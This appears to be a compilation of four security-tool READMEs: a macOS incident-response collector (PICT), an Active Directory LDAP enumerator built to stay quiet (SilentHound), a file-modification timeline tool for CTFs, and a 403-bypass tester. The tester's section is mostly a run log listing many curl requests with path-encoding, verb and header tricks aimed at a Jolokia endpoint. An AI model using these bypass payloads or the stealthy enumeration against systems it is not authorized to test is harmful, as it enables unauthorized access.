The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without them.
Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser
module will output a browser_extensions.txt
file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.
The second are complete files collected from the filesystem. These are stored in an artifacts
subfolder inside the collection folder.
The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:
./pict.py -c /path/to/config.json
The configuration script describes what the script will collect, and how. It should look something like this:
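The original example did not survive extraction here; based on the settings described below, a minimal configuration might look like the following sketch. The outputPath, allUsers, settings, and moduleSettings key names are assumptions; check the PICT repository for the exact schema.

```json
{
    "outputPath": "~/pict-output",
    "allUsers": true,
    "collectors": {
        "browser": "BrowserCollector"
    },
    "unused": {},
    "settings": {
        "keepLSData": false,
        "zipIt": true
    },
    "moduleSettings": {
        "browser": {
            "collectArtifacts": true
        }
    }
}
```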
This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared
.
Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD
, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.
If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.
PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.
The collectors
data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py
extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused
.
This dictionary provides global settings.
keepLSData
specifies whether the lsregister.txt
file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)
zipIt
specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.
This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts
being used with the browser
module.
There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.
collectArtifacts
specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.
Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py
), and they must be placed in the collectors
folder. A new Collector module can be easily created by duplicating the collectors/template.py
file and customizing it for your own use.
def __init__(self, collectionPath, allUsers)
This method can be overridden if necessary, but the superclass Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.
def printStartInfo(self)
This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.
def applySettings(self, settingsDict)
This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collector class can handle any settings that it defines.
def collect(self)
This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.
If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder and maintaining the metadata (permissions, extended attributes, flags, etc.) on the artifacts.
When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.
Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.
Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.
sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd SilentHound
pipenv install
This will create an isolated virtual environment with the dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.
This method is not recommended because python-ldap can cause many dependency errors.
Install dependencies with pip
:
python3 -m pip install -r requirements.txt
python3 silenthound.py -h
$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain
Quietly enumerate an Active Directory environment.
positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.
A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a lay of the land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.
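The single-query-then-parse approach can be sketched as follows. The entry shape mimics what python-ldap's search_s returns (a list of (dn, attrs) tuples with bytes attribute values), and the attribute names are standard Active Directory ones, but this is an illustration rather than SilentHound's actual code.

```python
def parse_entries(entries):
    """Split one LDAP search result into hosts, users, and groups by objectClass."""
    hosts, users, groups = [], [], []
    for dn, attrs in entries:
        classes = [c.decode() if isinstance(c, bytes) else c
                   for c in attrs.get("objectClass", [])]
        name = attrs.get("name", [b""])[0]
        name = name.decode() if isinstance(name, bytes) else name
        # Check "computer" first: in AD, computer objects also carry the
        # user/person classes, so the order of these tests matters.
        if "computer" in classes:
            hosts.append(name)
        elif "group" in classes:
            groups.append(name)
        elif "user" in classes or "person" in classes:
            users.append(name)
    return hosts, users, groups
```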
Using the -o flag will result in output files for each section normally printed to stdout. The files created using all flags will be:
-rw-r--r-- 1 kali kali 122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt
For additional feature requests please submit an issue and add the enhancement tag.
modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTFs to pinpoint where escalation and attack vectors may exist.
To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/share, /usr/lib, and /lib directories, which tend not to contain anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).
modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user-specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification time of each file, then sorts these modification times to output them chronologically.
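The walk-and-sort approach described above can be sketched in a few lines. The function name walk_mtimes is hypothetical; it illustrates the technique (pruning ignored directories during os.walk, then sorting by mtime), not modDetective's actual code.

```python
import os


def walk_mtimes(root, ignore=()):
    """Walk `root`, skipping any directory whose path starts with an ignored
    prefix, and return (mtime, path) pairs sorted chronologically."""
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune ignored directories in place so os.walk never descends into them
        dirnames[:] = [d for d in dirnames
                       if not any(os.path.join(dirpath, d).startswith(i) for i in ignore)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                results.append((os.path.getmtime(path), path))
            except OSError:
                continue  # unreadable or vanished files are skipped
    return sorted(results)  # tuples sort by mtime first, so output is chronological
```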
Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history, and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.
modDetective currently works only with python3; python2 compatibility will be completed shortly (hence the lack of f-strings). Standard libraries should be fine.
Tool that tests MANY URL bypasses to reach a 40X protected page.
If you wonder why this code is nothing but a dirty curl wrapper, here's why:
This is surprisingly hard to achieve in Python without losing all of the lib goodies like parsing, ssl/tls encapsulation and so on.
So, be like me, use curl as a backend; it's gonna be just fine.
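The "curl as a backend" idea amounts to generating one curl command line per bypass attempt and running them with subprocess, as in the generate_curls stage shown in the log below. Here is a minimal sketch of the verb-mutation part only; the verb list is illustrative and bup also mutates headers and path encodings, which this sketch omits.

```python
# Base options mirror the log output below: silent, insecure, keep the
# path exactly as given, and include response headers.
BASE_CURL = ["curl", "-sS", "-kgi", "--path-as-is"]
VERBS = ["GET", "POST", "PUT", "PATCH", "OPTIONS", "TRACE", "CONNECT"]


def generate_verb_curls(url):
    """Return one curl argv list per HTTP-verb bypass attempt."""
    cmds = [BASE_CURL + [url]]  # plain request first, as a baseline
    for verb in VERBS:
        cmds.append(BASE_CURL + ["-X", verb, url])
    return cmds
```

Each argv list can then be executed with subprocess.run and the responses compared by status code and body length to spot a bypass.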
# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
16: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xargs bat